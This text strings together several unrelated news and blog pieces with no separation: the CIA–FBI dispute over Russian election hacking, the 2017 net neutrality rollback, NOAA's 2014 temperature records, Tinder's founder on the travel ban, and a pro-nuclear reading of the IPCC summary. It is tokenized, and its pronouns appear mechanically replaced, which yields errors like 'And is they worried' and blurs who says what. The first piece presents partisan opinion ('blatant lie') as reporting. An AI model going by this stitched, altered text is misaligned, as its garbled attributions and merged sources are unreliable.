The conclusion , according to the New York Times , was the result entirely of “ overwhelming ” circumstantial evidence , particular the fact that the agency says the Russians hacked both DNC and RNC emails but only released emails from the DNC . Reuters notes that though the CIA is “ confident ” in their findings , not all intelligence agencies agree , including the United State 's top law enforcement
agency .
The Federal Bureau of Investigation , the same organization that decided that there was not enough evidence to prosecute Hillary Clinton regarding their personal email server , says that the “ evidence ” does not hold up to FBI standards , calling it a “ thin reed . ”
“ The judgment is based on the fact that Russian entities hacked both Democrats and Republicans and only the Democratic information was leaked . ( It was ) a thin reed upon which to base an analytical judgment . ”
Therefore , the FBI has refrained from making the same bold statements regarding Russian interference in the elections as the CIA . Republican John McCain is helping head a committee on the investigation into the Russian interference , but they stop short of making the claims that Russia was operating to help Trump . They note that information suggests Russia hacked both the DNC and RNC but says that “ there is no evidence ” that it was done to affect the election outcome . Therefore , they say an investigation is needed .
Despite the disagreement over the circumstantial evidence , that did n't stop Clinton 's campaign chairperson John Podesta from weighing in on the matter saying that Russia 's goal was “ hurting our campaign to aid Donald Trump. ” While that statement might be debatable depending on who you speak to , their secondary comments came out as a blatant lie .
“ Each day that month , our campaign decried the interference of Russia in our campaign and its evident goal of hurting our campaign to aid Donald Trump . Despite our protestations , this matter did not receive the attention it deserved by the media in the campaign . We now know that the CIA has determined Russia 's interference in our elections was for the purpose of electing Donald Trump . This should distress every American . ”
Podesta noted that the media was unresponsive to the Clinton campaign 's cries of Russian interference saying the issue did n't get “ the attention it deserved by the media. ” It is unclear why Podesta would make such a blatantly false statement as the Russian interference narrative was in the mainstream media for months leading up to the November election . Here are just a few small samples of the Russian hacking and election interference claims made by Clinton 's campaign being featured heavily in the news .
In addition to the prominent news stories covering the subject , if you do a quick Google search of Russian interference in the presidential election from September to November 8 , you will see literally thousands of articles discussing the matter . To say the issue was ignored by the media is blatantly false .
Hillary Clinton and John Podesta at the National Clean Energy Summit in Las Vegas , Nevada on September 14 , 2014 . [ Image by David Becker/Getty Images ]
Despite assessment relying solely on circumstantial evidence , it seems that many Democrats feel that the Democrat email release was a tactic by Russia to promote Trump over Clinton . Rep. Jim Himes ( D-Conn. ) , a member of the House Intelligence Committee , says that as a result , the Electoral College has the duty to “ choose someone other than Donald Trump ” to become president which they know might present a “ legal problem. ” However , they say they would rather have a legal problem than a Kremlin ally in the White House .
“ It became clear to me last night that this man is not only unqualified to be president , he 's a danger to the republic . I do think the Electoral College should choose someone other than Donald Trump to be president . That will lead to a fascinating legal issue… but I would rather have a legal problem — a constitutional legal problem — then to find out the White House was now the Kremlin 's chief ally . ”
What do you think about the controversy over the alleged Russian involvement in the presidential election ? What do you think about Podesta 's blatant lie about media coverage prior to the election ? Let us know your thoughts in the comments section below .
[ Featured Image by Matt Rourke/ AP Images ]
Illustration via Aaron Barksdale .
After deliberations in late October , Congress is poised to take action that will directly influence the future of the internet . The FCC is likely to announce a plan that would essentially kill net neutrality the day before Thanksgiving , with a final vote to go down some time in December of this year . Net neutrality is an essential consumer protection that ensures your experience online is protected from the interference of internet service providers ( ISP ) -- ie . Comcast , AT & T , Verizon or any other company you pay to be able to surf the web . According to TechCrunch , how you watch videos online , listen to music or download documents will change drastically if the move goes through .
Ending net neutrality has been a top target for the Trump administration 's Federal Communications Committee chairperson ( and former telecom giant Verizon attorney ) Ajit Pai . Back in the spring of 2017 , Pai 's FCC drafted the `` Restoring Internet Freedom '' proposal aimed at rolling back a 2015 Obama administration decision preserving net neutrality .
Proponents of net neutrality see it as a fundamental protection for individuals , businesses , and America 's overall freedom to ensure the internet does n't go down the road of cable television , thus no longer being the level playing field for communication , interaction and discovery .
What you can do :
According to a Mozilla survey , 76 percent of US internet users from all parties support net neutrality because it prevents ISPs from deciding how and what we can do online .
Advocacy group Fight for the Future wants supporters who want to prevent Congress from `` gutting the rules that keep the web open , affordable , and awesome '' to act now and call your members of Congress to oppose Pai 's plans .
With turkey day just around the corner , the time for action is now .
And then some :
Finding Pai 's intentions particularly unchill , fans of the legendary Vermont jam band Phish appear to be leading the opposition to rolling back net neutrality . They 're featuring a splash page on their fan website which is driving up the most actions after Fight for the Future 's flagship page .
The net neutrality-ready splash page on Phish.net
* Updated November 3 , 2017 12:15 pm ET to reflect an editorial mistake that incorrectly stated that the FCC is likely to vote on net neutrality on November 22nd . The story has been updated to reflect that the FCC is expected to announce their plan to kill net neutrality the day before Thanksgiving , with a final vote likely to follow in December .
Breaking News Emails Get breaking news alerts and special reports . The news and stories that matter , delivered weekday mornings .
Nov. 20 , 2014 , 7:17 PM GMT / Updated Nov. 20 , 2014 , 11:12 PM GMT
Even if it 's freezing in your personal universe , Earth as a whole just broke three `` warmest '' records and is likely to see 2014 go down as the warmest since record keeping began in 1880 , scientists reported Thursday .
Driven by record warm oceans , combined sea and land temperatures in October were the warmest on record , according to data released by the National Oceanic and Atmospheric Administration . On top of that , January-October was the warmest first 10 calendar months , while November 2013 to October 2014 was the warmest 12-month block .
Data released by the National Oceanic and Atmospheric Administration showed where the records fell , in large part due to record warm oceans :
Warmest October : The combined average temperature over global land and ocean surfaces was the highest on record for an October at 58.4 degrees F , or 1.3 degrees above the 20th century average and topping the previous record ( 2003 ) by 0.02 degrees .
The combined average temperature over global land and ocean surfaces was the highest on record for an October at 58.4 degrees F , or 1.3 degrees above the 20th century average and topping the previous record ( 2003 ) by 0.02 degrees . Warmest first 10 calendar months : The surface temperature for January-October was 58.6 degrees , 1.22 degrees above average and topping the previous record set ( 1998 and 2010 ) by 0.04 degrees . Ocean temperatures by themselves were 1.03 degrees above average , the highest on record for this period , beating the previous record ( 1998 ) by 0.05 degrees .
The surface temperature for January-October was 58.6 degrees , 1.22 degrees above average and topping the previous record set ( 1998 and 2010 ) by 0.04 degrees . Ocean temperatures by themselves were 1.03 degrees above average , the highest on record for this period , beating the previous record ( 1998 ) by 0.05 degrees . Warmest 12-month block : The period of November 2013-October 2014 averaged 58.2 degrees , 1.2 degrees above the norm , breaking a record set just a month ago for warmest 12-month period .
October was `` the sixth consecutive month where the ocean has been record warm , '' Deke Arndt , chief of climate monitoring at NOAA 's National Climatic Data Center , told reporters . And the average ocean temperatures for each of those months `` have all been the warmest for that month on record . ''
`` The oceans have been generally warming over time , '' they said , especially this year , which they called `` quite warm compared to even the warmest part of that history . ''
`` Clearly the oceans are driving the warmth that we 've seen around the planet , '' Arndt added .
And since the U.S. is only 2 percent of the planet , the current freeze and earlier relatively cool temperatures in the eastern half of the country do n't amount to much in terms of global temperatures .
`` Every major ocean basin and all continents all had pieces , and some had significant pieces , of their area that were the warmest on record '' between January-October , they added , referring to a NOAA map showing hot spots ( below ) .
Like so many other Americans , Tinder founder Sean Rad is the child of immigrants .
Their parents are originally from Iran , and although they were in Sydney , Australia on Tuesday , far from the rolling protests in the United States against what has become known as President Donald Trump 's Muslim travel ban , the issue could not be ignored .
The dating technology company has employees in the U.S. who are not citizens , but Rad told Mashable everyone is secure for now .
Tinder is watching the situation closely , they added . `` We have a very diverse culture . Everyone is in the U.S. and they 're good ... We 're focused on our employees and making sure that they feel safe . ''
Although the one-time Tinder CEO , now chairperson , has a reputation for speaking out of turn , they were measured Tuesday on the subject of Trump 's executive order . The ban , announced Friday , suspends travel for 90 days for those from seven predominantly Muslim countries , including Iran .
`` There are much better ways , I think , to approach the problems around immigration , '' they said . `` I 'm happy that the American people are free to speak up against things that they disagree with , even when your president does it . ''
Hopefully , Trump is listening to those making their voices heard , they added . `` No one 's perfect . No organisation , not even your president — what matters is that they 're listening . ''
By speaking on the topic , Rad is adding their voice to a swath of Silicon Valley leaders , from Twitter 's Jack Dorsey to Uber 's Travis Kalanick , who have commented on the ban in recent days .
`` I 'm happy that the American people are free to speak up against things that they disagree with , even when your president does it . ''
While their comments were by no means as forceful as those of Netflix CEO Reed Hastings , who called the ban `` so un-American it pains us , '' Rad did add that Silicon Valley leaders have a responsibility to speak out about social issues .
`` Any organisation that represents large groups of people has a responsibility , '' they said . `` We have these large platforms , and I think we have a responsibility to do good for our users and society . ''
Although they pointed out that Tinder is a much smaller company than a lot of the other brands making their views known , Rad suggested this week could mark the beginning of increased activism in Silicon Valley .
`` I think especially with this election , a lot of CEOs of these big tech companies have stepped up and taken a more active role in real world issues , and I think you 'll see more of that , '' they added .
And is they worried that all the marching , vigils and sit-ins will keep people away from dating and off of Tinder ?
`` I have n't heard anything like that , '' they laughed . `` But I would imagine it should inspire you to seek out a partner to grieve with . And maybe it will help to get out there and date and socialise more , and hear other people 's perspectives . ''
A few of my pronuclear friends have been disappointed by the treatment of nuclear energy in the recently released final draft of the IPCC working group III Summary for policymakers . For example , Steve Aplin at Canadian Energy Issues thinks that the IPCC is prejudiced against nuclear energy .
While there may be some members of the body who do n't like nuclear energy very much , the rational , numerate members of IPCC working group III managed to slide some very important words past the dissenters in a way that makes me , as a lover of careful wording , want to praise their composition skills .
policymakers should note that the word ‘ nuclear ' appears 11 times in the summary . In four of those important passages , it is a key component of a short list of zero- and low-carbon energy sources .
At the global level scenarios reaching 450 ppm are also characterized by more rapid improvements in energy efficiency , a tripling to nearly a quadrupling of the share of zero- and low-carbon supply from renewables , nuclear energy AND fossil energy with carbon capture and storage ( CCS ) OR bioenergy with CCS ( BECCS ) by the year 2050 . ( p. 15 )
carbon capture and storage ( CCS ) OR bioenergy CCS ( BECCS ) by the year 2050 . ( p. 15 ) Zero- and low-carbon energy supply includes renewables , nuclear energy , AND fossil energy with carbon dioxide capture and storage ( CCS ) , OR bioenergy with CCS ( BECCS ) . ( p. 16 )
In the majority of low-stabilization scenarios , the share of low-carbon electricity supply ( comprising renewable energy ( RE ) nuclear AND CCS ) increases from the current share of approximately 30 % to more than 80 % by 2050 , AND fossil fuel power generation without CCS is phased out almost entirely by 2100 . ( p. 23 )
CCS is phased out almost entirely by 2100 . ( p. 23 ) annual investment in low-carbon electricity supply ( i.e. , renewables nuclear AND electricity generation with CCS ) is projected to rise by about USD 147 ( 31-360 ) billion ( median : +100 % compared to 2010 ) ( p. 29 )
( Emphasis and capitalization of operators added . )
Not only have I spent time smithing words for human consumption in intensely political environments , but I also have a fair understanding of Boolean logic . I admire what the IPCC authors have accomplished . In both human communications and computer programming , the operators ‘ AND ' and ‘ OR ' have important meanings . So do modifiers like ‘ with ' . ( Fossil with CCS is a completely different animal than fossil without CCS . )
In my analysis , the recommendation for policymakers is quite clear . The only way to stabilize atmospheric CO2 concentration at acceptably low levels is to nearly quadruple the output of renewables , nuclear , AND electricity generation from fossil or bioenergy with CCS . The ‘ and ' means that all of the items on the list are needed , the program can not pick and choose the one or two that it likes the best .
However , since current electricity generation with CCS is virtually zero , nearly quadrupling it will mean it is still nearly zero in 2050 . Renewables will gain a substantial market share , but the biggest current source of zero- or low-carbon energy in the developed world — nuclear energy — will have to grow the most in absolute terms to keep doing its share of the heavy lifting .
IPCC working group III also provides some explanation for the current state of nuclear energy and its perceived utility .
Nuclear energy is a mature low-GHG emission source of baseload power , but its share of global electricity generation has been declining ( since 1993 ) . Nuclear energy could make an increasing contribution to low-carbon energy supply , but a variety of barriers and and risks exist ( robust evidence , high agreement )
Those include : operational risks , and the associated concerns , uranium mining risks , financial and regulatory risks , unresolved waste management issues , nuclear weapon proliferation concerns , and adverse public opinion ( robust evidence , high agreement . New fuel cycles and reactor technologies addressing some of these issues are being investigated and progress in research and development has been made concerning safety and waste disposal .
That explanation , in my opinion , is carefully worded to answer the logical questions that curious policymakers would be sure to ask – “ If nuclear energy is a proven , mature , low- or zero-emission power source , why is n't its use growing ? ” The IPCC working group has informed policymakers that the engineers and scientists are doing their part of addressing the reasons why nuclear energy has not been growing for the past 20 years , but the rest of the issues must be tackled by the policymakers themselves .
Most of the listed barriers to increasing clean energy output using atomic fission are political , not technical . That does not make them any more difficult to solve . In fact , the solutions are at hand , now all we need is a little more honesty and accurate risk assessment . The public 's opinion can be swayed by the people who have assumed the burden of leadership and spend most of their days working to influence the public to do the right thing .
If energy policy is important to you , please consider a donation to Atomic Insights LLC . Donations are not tax deductible ; Atomic Insights is a for-profit , tax-paying organization with a mission . We are passionate about finding and sharing accurate information and analysis about atomic energy , fuels politics , and the difficult energy choices that we all need to make .
If you think , but I 've already donated , ask yourself how many times you have tipped your favorite bartender , waiter , garbage man or valet . Is the service provided here any less valuable ?
